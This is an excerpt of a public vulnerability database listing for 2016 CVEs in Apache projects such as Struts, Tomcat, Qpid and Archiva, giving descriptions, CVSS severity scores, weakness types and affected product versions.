canonical ubuntu_linux 12.04
redhat enterprise_linux_eus 7.4
oracle jre 1.6.0
netapp e-series_santricity_storage_manager -
oracle linux 7
netapp oncommand_insight -
canonical ubuntu_linux 14.04
oracle linux 5
opensuse opensuse 13.1
redhat enterprise_linux_desktop 7.0
suse linux_enterprise_software_development_kit 12
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
netapp storagegrid *
suse linux_enterprise_server 11
oracle jdk 1.8.0
redhat satellite 5.7
netapp oncommand_report -
netapp e-series_santricity_web_services -
netapp oncommand_shift -
suse linux_enterprise_software_development_kit 11
suse linux_enterprise_desktop 12
netapp oncommand_cloud_manager -
suse linux_enterprise_module_for_legacy 12
redhat enterprise_linux_server_eus 7.2
suse manager_proxy 2.1
oracle jdk 1.7.0
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_workstation 5.0
suse openstack_cloud 5
oracle jrockit r28.3.9
redhat satellite 5.6
redhat enterprise_linux_server 5.0
oracle jdk 1.6.0
netapp oncommand_workflow_automation -
CVE-2016-4003 MEDIUM

Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts *
CVE-2016-4430 MEDIUM

Apache Struts 2 2.3.20 through 2.3.28.1 mishandles token validation, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.28.1
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4431 MEDIUM

Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4432 MEDIUM

The AMQP 0-8, 0-9, 0-91, and 0-10 connection handling in Apache Qpid Java before 6.0.3 might allow remote attackers to bypass authentication and consequently perform actions via vectors related to connection state logging.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache qpid_broker-j *
CVE-2016-4433 MEDIUM

Apache Struts 2 2.3.20 through 2.3.28.1 allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4434 MEDIUM

Apache Tika before 1.13 does not properly initialize the XML parser or choose handlers, which might allow remote attackers to conduct XML External Entity (XXE) attacks via vectors involving (1) spreadsheets in OOXML files and (2) XMP metadata in PDF and other file formats, a related issue to CVE-2016-2175.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache tika 1.12
CVE-2016-4436 HIGH

Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to have unspecified impact via vectors related to improper action name clean up.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.20
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.3.24.3
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.3.28.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.5
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.3.14
apache struts 2.3.1.2
apache struts 2.3.24.1
apache struts 2.2.3
apache struts 2.3.16
CVE-2016-4437 MEDIUM

Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,CWE-321,

Products Affected

Vendor Product Version
redhat fuse 1.0
redhat jboss_middleware_text-only_advisories 1.0
apache shiro *
apache aurora *
CVE-2016-4438 HIGH

The REST plugin in Apache Struts 2 2.3.19 through 2.3.28.1 allows remote attackers to execute arbitrary code via a crafted expression.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4460 HIGH

Apache Pony Mail 0.6c through 0.8b allows remote attackers to bypass authentication.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache pony_mail 0.7b
apache pony_mail 0.6c
apache pony_mail 0.8b
CVE-2016-4461 HIGH

Apache Struts 2.x before 2.3.29 allows remote attackers to execute arbitrary code via a "%{}" sequence in a tag attribute, aka forced double OGNL evaluation. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0785.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts *
netapp oncommand_balance -
CVE-2016-4462 MEDIUM

By manipulating the URL parameter externalLoginKey, a malicious, logged in user could pass valid Freemarker directives to the Template Engine that are reflected on the webpage; a specially crafted Freemarker template could be used for remote code execution. Mitigation: Upgrade to Apache OFBiz 16.11.01

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache ofbiz 13.07
apache ofbiz 13.07.02
apache ofbiz 11.04.05
apache ofbiz 11.04.01
apache ofbiz 11.04.06
apache ofbiz 12.04.01
apache ofbiz 12.04.05
apache ofbiz 12.04
apache ofbiz 11.04.03
apache ofbiz 13.07.03
apache ofbiz 11.04
apache ofbiz 12.04.04
apache ofbiz 11.04.04
apache ofbiz 12.04.03
apache ofbiz 12.04.06
apache ofbiz 12.04.02
apache ofbiz 11.04.02
apache ofbiz 13.07.01
CVE-2016-4463 MEDIUM

Stack-based buffer overflow in Apache Xerces-C++ before 3.1.4 allows context-dependent attackers to cause a denial of service via a deeply nested DTD.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache xerces-c++ *
debian debian_linux 8.0
CVE-2016-4464 HIGH

The application plugins in Apache CXF Fediz 1.2.x before 1.2.3 and 1.3.x before 1.3.1 do not match SAML AudienceRestriction values against configured audience URIs, which might allow remote attackers to have bypass intended restrictions and have unspecified other impact via a crafted SAML token with a trusted signature.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache cxf_fediz 1.2.0
apache cxf_fediz 1.2.2
apache cxf_fediz 1.3.0
apache cxf_fediz 1.2.1
CVE-2016-4465 MEDIUM

The URLValidator class in Apache Struts 2 2.3.20 through 2.3.28.1 and 2.5.x before 2.5.1 allows remote attackers to cause a denial of service via a null value for a URL field.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.5
apache struts 2.3.20
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.28.1
apache struts 2.3.24.1
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
CVE-2016-4467 MEDIUM

The C client and C-based client bindings in the Apache Qpid Proton library before 0.13.1 on Windows do not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate when using the SChannel-based security layer, which allows man-in-the-middle attackers to spoof servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache qpid_proton 0.12.2
apache qpid_proton 0.10.0
apache qpid_proton 0.9.0
apache qpid_proton 0.8.0
apache qpid_proton 0.9.1
apache qpid_proton 0.11.1
apache qpid_proton 0.12.0
apache qpid_proton 0.13.0
apache qpid_proton 0.11.0
apache qpid_proton 0.12.1
CVE-2016-4469 MEDIUM

Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.3.9 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) add new repository proxy connectors via the token parameter to admin/addProxyConnector_commit.action, (2) new repositories via the token parameter to admin/addRepository_commit.action, (3) edit existing repositories via the token parameter to admin/editRepository_commit.action, (4) add legacy artifact paths via the token parameter to admin/addLegacyArtifactPath_commit.action, (5) change the organizational appearance via the token parameter to admin/saveAppearance.action, or (6) upload new artifacts via the token parameter to upload_submit.action.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache archiva *
CVE-2016-4970 HIGH

handler/ssl/OpenSslEngine.java in Netty 4.0.x before 4.0.37.Final and 4.1.x before 4.1.1.Final allows remote attackers to cause a denial of service (infinite loop).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: HIGH

Problem Type: CWE-835,

Products Affected

Vendor Product Version
redhat jboss_middleware_text-only_advisories 1.0
redhat jboss_data_grid 7.1
netty netty *
apache cassandra 3.11.4
CVE-2016-4974 MEDIUM

Apache Qpid AMQP 0-x JMS client before 6.0.4 and JMS (AMQP 1.0) before 0.10.0 does not restrict the use of classes available on the classpath, which might allow remote authenticated users with permission to send messages to deserialize arbitrary objects and execute arbitrary code by leveraging a crafted serialized object in a JMS ObjectMessage that is handled by the getObject function.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache jms_client_amqp *
apache amqp_0-x_jms_client *
CVE-2016-4975 MEDIUM

Possible CRLF injection allowing HTTP response splitting attacks for sites which use mod_userdir. This issue was mitigated by changes made in 2.4.25 and 2.2.32 which prohibit CR or LF injection into the "Location" or other outbound header key or value. Fixed in Apache HTTP Server 2.4.25 (Affected 2.4.1-2.4.23). Fixed in Apache HTTP Server 2.2.32 (Affected 2.2.0-2.2.31).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-93,

Products Affected

Vendor Product Version
apache http_server 2.2.10
apache http_server 2.4.7
apache http_server 2.2.17
apache http_server 2.2.27
apache http_server 2.2.31
apache http_server 2.4.2
apache http_server 2.2.19
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.4.18
apache http_server 2.2.2
apache http_server 2.4.3
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.4.17
apache http_server 2.2.20
apache http_server 2.2.0
apache http_server 2.2.16
apache http_server 2.2.25
apache http_server 2.2.26
apache http_server 2.2.12
apache http_server 2.2.29
apache http_server 2.2.6
apache http_server 2.2.23
apache http_server 2.2.13
apache http_server 2.2.18
apache http_server 2.4.23
apache http_server 2.4.6
apache http_server 2.2.8
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.4
apache http_server 2.4.16
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.4.9
apache http_server 2.2.22
apache http_server 2.2.3
apache http_server 2.2.24
CVE-2016-4976 LOW

Apache Ambari 2.x before 2.4.0 includes KDC administrator passwords on the kadmin command line, which allows local users to obtain sensitive information via a process listing.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ambari 2.0.1
apache ambari 2.2.0
apache ambari 2.2.2
apache ambari 2.0.2
apache ambari 2.2.1
apache ambari 2.0.0
apache ambari 2.1.0
apache ambari 2.1.1
apache ambari 2.1.2
CVE-2016-4978 MEDIUM

The getObject method of the javax.jms.ObjectMessage class in the (1) JMS Core client, (2) Artemis broker, and (3) Artemis REST component in Apache ActiveMQ Artemis before 1.4.0 might allow remote authenticated users with permission to send messages to the Artemis broker to deserialize arbitrary objects and execute arbitrary code by leveraging gadget classes being present on the Artemis classpath.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
redhat jboss_enterprise_application_platform 7.0.0
redhat jboss_enterprise_application_platform 6.0.0
apache activemq_artemis *
redhat jboss_enterprise_application_platform 6.4.0
redhat jboss_enterprise_application_platform 7.1.0
CVE-2016-4979 MEDIUM

The Apache HTTP Server 2.4.18 through 2.4.20, when mod_http2 and mod_ssl are enabled, does not properly recognize the "SSLVerifyClient require" directive for HTTP/2 request authorization, which allows remote attackers to bypass intended access restrictions by leveraging the ability to send multiple requests over a single connection and aborting a renegotiation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache http_server 2.4.19
apache http_server 2.4.20
apache http_server 2.4.18
CVE-2016-5000 MEDIUM

The XLSX2CSV example in Apache POI before 3.14 allows remote attackers to read arbitrary files via a crafted OpenXML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache poi *
CVE-2016-5001 LOW

This is an information disclosure vulnerability in Apache Hadoop before 2.6.4 and 2.7.x before 2.7.2 in the short-circuit reads feature of HDFS. A local user on an HDFS DataNode may be able to craft a block token that grants unauthorized read access to random files by guessing certain fields in the token.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.7.1
apache hadoop 2.7.0
apache hadoop *
CVE-2016-5002 HIGH

XML external entity (XXE) vulnerability in the Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted DTD.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache xml-rpc 3.1.3
CVE-2016-5003 HIGH

The Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to execute arbitrary code via a crafted serialized Java object in an <ex:serializable> element.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ws-xmlrpc 3.1.3
CVE-2016-5004 MEDIUM

The Content-Encoding HTTP header feature in ws-xmlrpc 3.1.3 as used in Apache Archiva allows remote attackers to cause a denial of service (resource consumption) by decompressing a large file containing zeroes.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache ws-xmlrpc 3.1.3
CVE-2016-5005 LOW

Cross-site scripting (XSS) vulnerability in Apache Archiva 1.3.9 and earlier allows remote authenticated administrators to inject arbitrary web script or HTML via the connector.sourceRepoId parameter to admin/addProxyConnector_commit.action.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva *
CVE-2016-5017 MEDIUM

Buffer overflow in the C cli shell in Apache Zookeeper before 3.4.9 and 3.5.x before 3.5.3, when using the "cmd:" batch mode syntax, allows attackers to have unspecified impact via a long command string.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache zookeeper 3.5.1
apache zookeeper 3.5.0
apache zookeeper *
apache zookeeper 3.5.2
CVE-2016-5018 MEDIUM

In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 a malicious web application was able to bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
redhat enterprise_linux_eus 7.5
redhat jboss_enterprise_application_platform 6.4
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-5019 HIGH

CoreResponseStateManager in Apache MyFaces Trinidad 1.0.0 through 1.0.13, 1.2.x before 1.2.15, 2.0.x before 2.0.2, and 2.1.x before 2.1.2 might allow attackers to conduct deserialization attacks via a crafted serialized view state string.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache myfaces_trinidad *
CVE-2016-5387 MEDIUM

The Apache HTTP Server through 2.4.23 follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "This mitigation has been assigned the identifier CVE-2016-5387"; in other words, this is not a CVE ID for a vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
apache http_server *
redhat jboss_web_server 2.1.0
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
opensuse leap 42.1
hp system_management_homepage *
redhat enterprise_linux_server_tus 7.6
fedoraproject fedora 24
redhat jboss_core_services 1.0
canonical ubuntu_linux 15.10
redhat enterprise_linux_eus 7.6
canonical ubuntu_linux 12.04
redhat enterprise_linux_eus 7.4
oracle linux 7
redhat enterprise_linux_server 6.0
canonical ubuntu_linux 14.04
oracle linux 5
oracle communications_user_data_repository *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
oracle enterprise_manager_ops_center 12.3.2
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.2
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
oracle linux 6
oracle enterprise_manager_ops_center 12.2.2
fedoraproject fedora 23
opensuse opensuse 13.2
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_workstation 6.0
redhat jboss_enterprise_web_server 2.0.0
oracle solaris 11.3
redhat enterprise_linux_server 7.0
CVE-2016-5388 MEDIUM

Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
oracle linux 6
hp system_management_homepage *
redhat enterprise_linux_hpc_node 7.0
redhat enterprise_linux_desktop 6.0
apache tomcat *
redhat enterprise_linux_server_eus 7.2
oracle linux 7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_server 6.0
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_hpc_node_eus 7.2
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_hpc_node 6.0
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-5393 MEDIUM

In Apache Hadoop 2.6.x before 2.6.5 and 2.7.x before 2.7.3, a remote user who can authenticate with the HDFS NameNode can possibly run arbitrary commands with the same privileges as the HDFS service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache hadoop 2.6.2
apache hadoop 2.6.4
apache hadoop 2.7.1
apache hadoop 2.7.0
apache hadoop 2.6.0
apache hadoop 2.6.3
apache hadoop 2.7.2
apache hadoop 2.6.1
CVE-2016-5394 MEDIUM

In the XSS Protection API module before 1.0.12 in Apache Sling, the encoding done by the XSSAPI.encodeForJSString() method is not restrictive enough and for some input patterns allows script tags to pass through unencoded, leading to potential XSS vulnerabilities.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling *
CVE-2016-5395 LOW

Cross-site scripting (XSS) vulnerability in the create user functionality in the policy admin tool in Apache Ranger before 0.6.1 allows remote authenticated administrators to inject arbitrary web script or HTML via vectors related to policies.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ranger 0.5.1
apache ranger 0.5.3
apache ranger 0.5.2
apache ranger *
apache ranger 0.6.0
CVE-2016-5396 HIGH

Apache Traffic Server 6.0.0 to 6.2.0 are affected by an HPACK Bomb Attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache traffic_server 6.2.0
apache traffic_server 6.1.0
apache traffic_server 6.1.1
apache traffic_server 6.0.0
CVE-2016-5397 HIGH

The Apache Thrift Go client library exposed the potential during code generation for command injection due to using an external formatting tool. Affected Apache Thrift 0.9.3 and older, Fixed in Apache Thrift 0.10.0.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache thrift *
CVE-2016-5425 HIGH

The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-276,

Products Affected

Vendor Product Version
apache tomcat -
CVE-2016-6325 HIGH

The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1) /etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows local users to gain privileges by leveraging membership in the tomcat group.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat -
CVE-2016-6497 MEDIUM

main/java/org/apache/directory/groovyldap/LDAP.java in the Groovy LDAP API in Apache allows attackers to conduct LDAP entry poisoning attacks by leveraging setting returnObjFlag to true for all search methods.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache groovy_ldap *
CVE-2016-6793 MEDIUM

The DiskFileItem class in Apache Wicket 6.x before 6.25.0 and 1.5.x before 1.5.17 allows remote attackers to cause a denial of service (infinite loop) and write to, move, and delete files with the permissions of DiskFileItem, and if running on a Java VM before 1.3.1, execute arbitrary code via a crafted serialized Java object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache wicket *
CVE-2016-6794 MEDIUM

When a SecurityManager is configured, a web application's ability to read system properties should be controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution *
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-6795 HIGH

In the Convention plugin in Apache Struts 2.3.x before 2.3.31, and 2.5.x before 2.5.5, it is possible to prepare a special URL which will be used for path traversal and execution of arbitrary code on server side.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.22
apache struts 2.3.26
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
apache struts 2.3.29
apache struts 2.3.28
apache struts 2.3.20.3
apache struts 2.3.27
apache struts 2.3.28.1
apache struts 2.3.24.2
apache struts 2.3.24.1
apache struts 2.3.30
apache struts 2.3.21
apache struts 2.3.25
apache struts 2.3.20.2
apache struts 2.3.23
CVE-2016-6796 MEDIUM

A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
redhat enterprise_linux_eus 7.5
redhat jboss_enterprise_application_platform 6.4
oracle tekelec_platform_distribution 7.4.0
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
apache tomcat *
redhat enterprise_linux_eus 7.4
redhat enterprise_linux_server_aus 7.7
canonical ubuntu_linux 16.04
redhat enterprise_linux_server_tus 7.7
netapp oncommand_insight -
apache tomcat 9.0.0
oracle tekelec_platform_distribution 7.7.1
redhat jboss_enterprise_web_server 3.0.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2016-6797 MEDIUM

The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
redhat enterprise_linux_eus 7.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.6
netapp oncommand_shift -
redhat enterprise_linux_eus 7.5
redhat enterprise_linux_eus 7.6
debian debian_linux 8.0
